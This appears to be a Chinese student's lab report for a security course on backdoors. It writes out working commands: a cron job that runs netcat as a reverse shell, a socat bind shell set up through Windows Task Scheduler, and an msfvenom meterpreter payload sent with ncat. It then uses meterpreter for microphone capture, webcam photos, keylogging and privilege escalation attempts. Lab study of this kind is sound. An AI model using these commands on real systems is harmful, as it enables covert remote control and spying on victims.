20155312 張競予 Exp2 後門原理與實踐

Exp2 後門原理與實踐

目錄

• 基礎問題回答
  • (1)例舉你能想到的一個後門進入到你係統中的可能方式？
  • (2)例舉你知道的後門如何啓動起來(win及linux)的方式？
  • (3)Meterpreter有哪些給你映像深入的功能？
  • (4)如何發現本身有系統有沒有被安裝後門？
• 實驗總結與體會
• 實踐過程記錄
  • 使用netcat獲取主機操做Shell，cron啓動
  • 使用socat獲取主機操做Shell, 任務計劃啓動
  • 使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell
  • 使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

---

基礎問題回答

(1)例舉你能想到的一個後門進入到你係統中的可能方式？

多是咱們點開某個連接的時候，自動加載了某個可執行文件，就相似於執行了實驗中傳入到windows中的backdoor.exe；也多是咱們點開某個網頁時，該網頁經過木馬的方式在咱們不知情的狀況下自動下載了某個後門文件。

(2)例舉你知道的後門如何啓動起來(win及linux)的方式？

• linux中可能crontab文件被修改，週期性（定時）反向鏈接控制主機，只要控制主機保持偵聽狀態，就能夠週期性啓動後門，控制被控主機。
• windows中多是被動下載、接收了後門程序，當被控端點擊運行該程序時，後門便會啓動。

(3)Meterpreter有哪些給你映像深入的功能？

可以獲取被控主機的麥克風錄音、獲取被控主機的攝像頭拍照和錄像。

(4)如何發現本身有系統有沒有被安裝後門？

利用防火牆，在防火牆看開啓的端口及對應的進程，通常不是系統默認開啓的端口都是可疑的，要找一下對應的進程，找到對應進程，對相應進程進行抓包，看他通訊的數據，分析是否是後門。

按期用360管家等軟件對系統進行檢測，及時處理疑似病毒、木馬的程序。

返回目錄

---

實踐過程記錄

1、使用netcat獲取主機操做Shell，cron啓動

首先查看WindowsIP和LinuxIP：

• Windows下用命令ipconfig：

• Linux下用ifconfig -a

Windows得到linux的shell：

cron啓動過程以下：

1. 先在Windows系統下，監聽8888端口
2. 在Kali環境下，用crontab -e指令編輯一條定時任務，選擇編輯器時選擇"3"；
3. 在最後一行添加09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh，意思是在每一個小時的第37分鐘反向鏈接Windows主機的8888端口，設置成09的緣由是我當時的時間是11點07，爲了能立馬看到效果，因此我將時間設置成了「09」(注意這裏的IP地址應該爲控制主機的IP)；

4.最後運行結果以下所示：

返回目錄

2、使用socat獲取主機操做Shell, 任務計劃啓動

1.Windows+X，而後選擇「控制面板」（win8下打開控制面板）

2.右上角「查看方式」選擇「大圖標」

3.點擊管理程序->點擊任務計劃程序

4.選擇上方菜單欄中的「操做」->「建立任務」

5.輸入任務名

6.新建觸發器，在操做->程序或腳本中選擇你的socat.exe文件的路徑，在添加參數一欄填寫tcp-listen:8888 exec:cmd.exe,pty,stderr，這個命令的做用是把cmd.exe綁定到端口8888，同時把cmd.exe的stderr重定向到stdout上

7.建立完成以後，按Windows+L快捷鍵鎖定計算機，再次打開時，能夠發現以前建立的任務已經開始運行

8.socat - tcp:192.168.199.196:8888，這裏的第一個參數-表明標準的輸入輸出，第二個流鏈接到Windows主機的8888端口，此時能夠發現已經成功得到了一個cmd shell：（此處的IP地址爲WindowsIP）

返回目錄

3、使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

1.在Kali上執行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe，注意這裏的IP地址爲控制端IP，即LinuxIP，可見已經生成了後門程序「20155312_backdoor.exe」

2.在Windows下執行ncat.exe -l 8888 > 20155312_backdoor.exe，這樣被控主機就進入了接收文件模式

3.在Linux中執行nc 192.168.199.196 8888 < 20155312_backdoor.exe，注意這裏的IP爲被控主機IP，即WindowsIP

4.傳送接收文件成功，以下圖所示：

5.在Kali中打開一個終端，使用msfconsole指令進入msf控制檯

6.接着輸入use exploit/multi/handler使用監聽模塊，設置payload

7.set payload windows/meterpreter/reverse_tcp，使用和生成後門程序時相同的payload

8.set LHOST 192.168.20.136，這裏用的是LinuxIP，和生成後門程序時指定的IP相同

9.set LPORT 8888，一樣要使用相同的端口

10.開始監聽

返回目錄

4、使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

1.使用record_mic指令能夠截獲一段音頻：（能夠+「-d 時間」來設定錄製時間）

2.使用webcam_snap指令可使用攝像頭進行拍照：

3.使用keyscan_start指令開始記錄下擊鍵的過程，使用keyscan_dump指令讀取擊鍵的記錄：

4.先使用getuid指令查看當前用戶，使用getsystem指令進行提權，因爲是Win8系統，提權失敗：

5.其餘操做：

• 使用screenshot指令能夠進行截屏
• 用webcam stream指令可使用攝像頭進行錄像
• ……

返回目錄

---

實驗總結與體會

經過本次實驗，我學會了若是對linux和windows植入後門，包括開啓偵聽、反向鏈接、生成後門程序、傳送後門程序、控制被控主機、修改定時任務列表、使用socat獲取主機操做Shell等。在動手實驗的過程當中既體會到了做爲攻擊者的樂趣，更加深入的體會到了使用計算機時加強安全意識的重要性。平時上網的時候，必定要注意不點擊不靠譜連接，下載軟件時儘可能選擇官網下載，防止下載盜版軟件時被捆綁下載其餘後門程序。

返回目錄